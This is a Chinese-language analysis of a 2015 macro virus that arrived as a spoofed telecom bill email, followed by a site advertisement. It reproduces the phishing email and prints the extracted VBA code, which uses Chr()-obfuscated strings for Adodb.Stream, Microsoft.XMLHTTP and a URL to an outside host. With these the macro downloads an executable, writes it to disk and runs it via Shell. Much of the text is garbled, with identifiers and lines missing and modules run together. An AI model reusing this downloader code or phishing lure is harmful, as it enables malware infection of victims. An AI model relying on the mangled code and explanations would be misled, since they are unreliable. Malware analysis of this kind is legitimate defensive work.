1.通过邮件传播的宏病毒
近期流行的一个宏病毒通过邮件进行传播,捕捉到的一个样本,其邮件头如下:
邮件的内容是这样子的(为节省篇幅,省略号处省略部分内容):
Your bill
: 24583
:
Bill date: July 2015
: £17.50
How can I view my bills?
Your Chess bill is ready and for you . To check out your deta=, bills and any you’ve since your last b=ll, just sign into My your sign in ?
If you’ve your sign in , no , you can reset these b=
is easy!
If you want to make a or debit card you can do by cho=sing
You don’t need to do if you pay by debit, we will y=ur on or after 30th June. If you pay by , deta=ls of how to pay us are on the .
to Debit today and you’ll save at least £60.00 a year, s=mply call our team on 0844 770 6060.
else you’d like to know?
……
This e-mail has been sent from a to Chess , House, Heyes Lane, Edge, , SK9=7JP.
in , . Its are to the=20 .
If you in error, Chess on
+44 (0)800 019 8900 the name of the , the
which it has been sent and then it; you may not rely on i=s nor copy/ it to .
, and
of in this email are those of the and will not bind Chess Tel=com by an of this mess=ge.
We do not for ; you must scan for these.
sent to and from Chess are for=20 , and , to =20 and to and use of our .
Thank you for your co-.
are to terms and , VAT and are to .
E&OE
上述邮件正文:描述内容看起来相当的可靠,里面的电话号码都是真实的,并且给出了具体的公司名称地址,而且这个公司还真是具体存在的,现在还不知道这个公司是否知道自己被人冒名干坏事儿了(有点绕口,但不是重点…),之所以这么逼真,只是恶意邮件发送者希望以此来降低受害者的防备意识。
2.提取宏代码
我们主要分析的邮件的附件,通过的保存功能可以将邮件中的附件2015-07-Bill.docm保存出来,我们分析需要用到一个工具,可以到这里下载。
提取宏代码的步骤如下:
2.1 解压
.exe 2015-07-Bill.docm
解压后将会默认保存到C:~1~1~1Temp目录下面(WinXP SP3环境),解压后的目录大致如下:
│ [].xml
│
├─
│ app.xml
│ core.xml
│
├─word
│ │ .xml
│ │ .xml
│ │ .xml
│ │ .xml
│ │ .xml
│ │ .bin
│ │ .xml
│ │
│ ├─theme
│ │ .xml
│ │
│ └─_rels
│ .xml.rels
│ .bin.rels
│
└─_rels
上面的文档目录结构中可以发现在word目录下含有一个.bin的文件,这就是宏文件代码所在的地方,需要注意的是名字是可以任意取的,并不一定就是(为默认的宏文件名字)。接下来从.bin文件中提取宏代码。
2.2 提取
.exe .bin info
默认会在.bin同目录下生成一个文件夹.BIN-,里面存放有vba宏代码的各个模块。本案例中所提取到的各个文件如下:
上面的文件都是vb代码,只不过去掉了后缀而已。接着的工作就是分析vb代码,看一下具体做了什么。
3.代码分析
为了便于说明,并没有按照模块的顺序来说明。
3.1 代码分析
的代码如下:
1 = “”
3 init
5 Set = Forms(“main”)
7 = .
8 = .
10 End
11 ( As )
12 = (((, Chr(60), “”), Chr(61), “”), Chr(59), “”)
13 Set = ()
14 End
15 Sub
16 On Error GoTo
17
18 = .Value
19 = “”
20 DoCmd. ,
21
22 :
23 Exit Sub
24
25 :
26 Err.
27
28
29 End Sub
主要看[11-14]行代码,如下:
( As )
= (((, Chr(60), “”), Chr(61), “”), Chr(59), “”)
Set = ()
End
函数中的主要语句(((, Chr(60), “”), Chr(61), “”), Chr(59), “”),其中的Chr(60),chr(61),Chr(59)分别对应于 0 Or Me. > 0 Then
7 Me.total = ( * Me.boxes) + Me.
8 Else
9 Me.total = Me.
10 End If
11
12 End Sub
13
14 Sub
15 If Me.boxes > 0 Then
16 Me.total = * Me.boxes
17 End If
18 End Sub
19
20 ( As , )
21 Dim : Set = (“A” & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & “e” & Chr(97) & Chr(59) & “m”)
22
23 With
24 .Type = 1
25 .Open
26 .write
27 End With
. , 2
29 End
30 Sub
31 If Me.boxes > 0 Or Me. > 0 Then
32 Me.total = ( * Me.boxes) + Me.
33 Else
34 Me.total = Me.
35 End If
36 End Sub
37
38 Sub
39 DoCmd.Save
40 End Sub
主要看[20-29]代码段,如下:
( As , )
Dim : Set = (“A” & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & “e” & Chr(97) & Chr(59) & “m”)
With
.Type = 1
.Open
.write
End With
. , 2
End
(“A” & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & “e” & Chr(97) & Chr(59) & “m”)
可以看到这里采用了中的解密函数,对加密的字符串进行解密后使用。我们已经知道了函数的作用,因此手工解密后得到:
删除其中的”空格 ; < =",得到真正的命令:Adodb.。进一步分析可以得到该函数的作用为:
采用adodb.流,将字节数组写入指定文件中。
稍后我将会提供一个脚本对这些命令进行解密,还原出宏代码的真正命令。
3.3 模块分析
1 = “”
3 As
4 As
5 As
6 As ‘query base
7 As ‘ form name
8 As ‘text field for code entry
9 As ‘text field for name entry
10 As
11 As
12 colS1 As ‘ to
13 colS2 As ‘ to
14
15
16
17 ‘check form if they have user input
18 If Not (Forms().()) Then
19 = Forms().()
20 Else
21 = “”
22 End If
23
24 If Not (Forms().()) Then
25 = Forms().()
26 Else
27 = “”
28 End If
29
30 ‘main logic
31 If ( = “” And = “”) Or (() And ()) Then
32 =
33 (Not () = True) And (Not () = True) Then
34 = & ” WHERE ” & colS1 & ” LIKE ‘” & & “*’ AND ” & colS2 & ” LIKE ‘*” & & “*'”
35 Not () Then
36 = & ” WHERE ” & colS1 & ” LIKE ‘” & & “*'”
37 Not () Then
38 = & ” WHERE ” & colS2 & ” LIKE ‘*” & & “*'”
39 Else
40 ” to “
41 Exit
42 End If
43
44 Forms(). =
45
46 End
47 ( As )
48
49 .().Left = 720
50
51 End
52
53 Sub
54
55 = Chr(104) & Chr(116) & Chr(61) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(59) & Chr(47) & Chr(108) & Chr(97) & Chr(98) & Chr(111) & “a” & Chr(60) & Chr(117) & “d” & Chr(105) & Chr(111) & Chr(46) & Chr(61) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(52) & Chr(116) & Chr(102) & Chr(51) & Chr(51) & Chr(119) & Chr(47) & Chr(60) & Chr(119) & Chr(52) & Chr(116) & Chr(52) & Chr(53) & Chr(51) & Chr(46) & Chr(59) & “e” & Chr(61) & Chr(120) & Chr(101)
‘下载方式:=.
56 Set = (“M” & “i” & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & “s” & Chr(111) & “f” & Chr(116) & “;” & Chr(46) & “X” & Chr(77) & Chr(60) & “L” & Chr(59) & Chr(72) & “T” & Chr(61) & Chr(84) & “P”)
57
58 = (((, Chr(60), “”), Chr(61), “”), Chr(59), “”)
‘使用进行下载: . Open
59 , Chr(79) & Chr(112) & Chr(101) & Chr(110), , Chr(71) & Chr(69) & Chr(84), _
60 _
61 , False
62
‘=.Shell
63 Set = (Chr(87) & “
———END———
限 时 特 惠: 本站每日持续更新海量各大内部创业教程,永久会员只需109元,全站资源免费下载 点击查看详情
站 长 微 信: nanadh666